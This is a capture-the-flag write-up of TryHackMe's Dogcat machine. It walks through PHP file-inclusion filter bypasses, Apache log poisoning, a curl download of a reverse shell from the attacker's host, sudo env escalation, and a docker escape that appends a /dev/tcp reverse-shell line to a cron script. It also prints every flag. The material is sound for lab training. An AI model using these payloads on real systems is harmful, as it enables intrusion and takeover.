---
title: "Writeup - Dogcat (THM)"
date: 2022-05-31
slug: "writeup-dogcat-thm"
type: "writeup-ctf"
--- 

This is a writeup for the [Dogcat](https://tryhackme.com/room/dogcat) machine from the TryHackMe site.

## Enumeration

First, let's start with a scan of our target with the following command:


```bash
nmap -sV -T4 -Pn 10.10.11.146
```
Two TCP ports are discovered:

![](img/image-1.webp)

- 22/tcp : SSH port (OpenSSH 7.6p1)
- 80/tcp : HTTP web server (Apache 2.4.38)

![](img/image-2.webp)

## Exploit

In a first step I start by making a scan of the website folders:

![](img/image-3.webp)

We find a page `cat.php`, it is surely the page which provides the random images of cat. With a little deduction I find a similar page: `dog.php`.

I notice the use of an argument when I click on one of the buttons. So I try a Local-Remote File Inclusion, but without success. An error tells us that the options are: `dog` & `cat`.

After some research I find the following page: [PHP Base64 Filter](https://blog.clever-age.com/fr/2014/10/21/owasp-local-remote-file-inclusion-lfi-rfi/). These are techniques to bypass security checks for Local-Remote File Inclusion. I try the version using a PHP filter:


```bash
http://10.10.91.89/?view=php://filter/read=convert.base64-encode/resource=cat/../index
```
I get the contents of the index file encoded in base64 :


```bash
<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
        <?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
            $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>
    </div>
</body>

</html>
```
I can also use the same principle to get the content of the `flag.php` flag.


```bash
┌──(d3vyce㉿kali)-[~/Documents]
└─$ echo "PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=" | base64 -d
<?php
$flag_1 = "THM{Th1s_1s_N0t_4_Catdog_ab67edfa}"
?>
```
Pour faire une injection de commande //TODO

![](img/image-4.webp)


```bash
[11/May/2022:12:26:50 +0000] "GET /?view=php://filter/read=convert.base64-encode/resource=cat/../../../../etc/passwd&ext&test=id HTTP/1.1" 400 0 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data) "
```

```bash
http://10.10.91.89/?view=php://filter/resource=cat/../../../../../var/log/apache2/access.log&ext&test=curl%2010.8.3.186:80/reverse.php%20%3E%20reverse.php
```
![](img/image-5.webp)

I now have a reverse shell as `www-data`.


```bash
$ cd /var/www
$ ls
flag2_QMW7JvaY2LvK.txt
html
$ cat flag2_QMW7JvaY2LvK.txt
THM{LF1_t0_RC3_aec3fb}
```
I can get the second flag.

## Privilege escalation

I start by checking the sudo permissions of my user :

![](img/image-6.webp)

I have the permission to run the `env` command as `root`. So I look on GTFObin to see if there is a possibility to launch a shell with this command: [env sudo](https://gtfobins.github.io/gtfobins/env/#sudo).

With the following command I create a `root` shell.

![](img/image-7.webp)


```bash
cd /root
ls
flag3.txt
cat flag3.txt
THM{D1ff3r3nt_3nv1ronments_874112}
```
I can get the third flag. After some research I notice a `dockerenv` file. So we are in a docker and I will have to find a way to get out to get the last flag.


```bash
ls -la
total 80
drwxr-xr-x   1 root root 4096 May 11 11:59 .
drwxr-xr-x   1 root root 4096 May 11 11:59 ..
-rwxr-xr-x   1 root root    0 May 11 11:59 .dockerenv
drwxr-xr-x   1 root root 4096 Feb 26  2020 bin
drwxr-xr-x   2 root root 4096 Feb  1  2020 boot
drwxr-xr-x   5 root root  340 May 11 11:59 dev
drwxr-xr-x   1 root root 4096 May 11 11:59 etc
drwxr-xr-x   2 root root 4096 Feb  1  2020 home
drwxr-xr-x   1 root root 4096 Feb 26  2020 lib
drwxr-xr-x   2 root root 4096 Feb 24  2020 lib64
drwxr-xr-x   2 root root 4096 Feb 24  2020 media
drwxr-xr-x   2 root root 4096 Feb 24  2020 mnt
drwxr-xr-x   1 root root 4096 May 11 11:59 opt
dr-xr-xr-x 112 root root    0 May 11 11:59 proc
drwx------   1 root root 4096 Mar 10  2020 root
drwxr-xr-x   1 root root 4096 Feb 26  2020 run
drwxr-xr-x   1 root root 4096 Feb 26  2020 sbin
drwxr-xr-x   2 root root 4096 Feb 24  2020 srv
dr-xr-xr-x  13 root root    0 May 11 11:59 sys
drwxrwxrwt   1 root root 4096 Mar 10  2020 tmp
drwxr-xr-x   1 root root 4096 Feb 24  2020 usr
drwxr-xr-x   1 root root 4096 Feb 26  2020 var
ls /otp
ls: cannot access '/otp': No such file or directory
ls /opt
backups
```
In the `/opt` folder I find a `backups` file with the following content:


```bash
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
```
backup.shIt is most certainly a script that runs regularly with a CRON job. Knowing that I can write to the file, I add the following line:


```bash
echo "bash -i >& /dev/tcp/10.8.3.186/2345 0>&1" >> backup.sh
```
After a few seconds, I have a reverse shell as root but on the machine and not in a docker.

![](img/image-8.webp)

I can now recover the last flag.


```bash
# cat /root/flag4.txt
THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}
```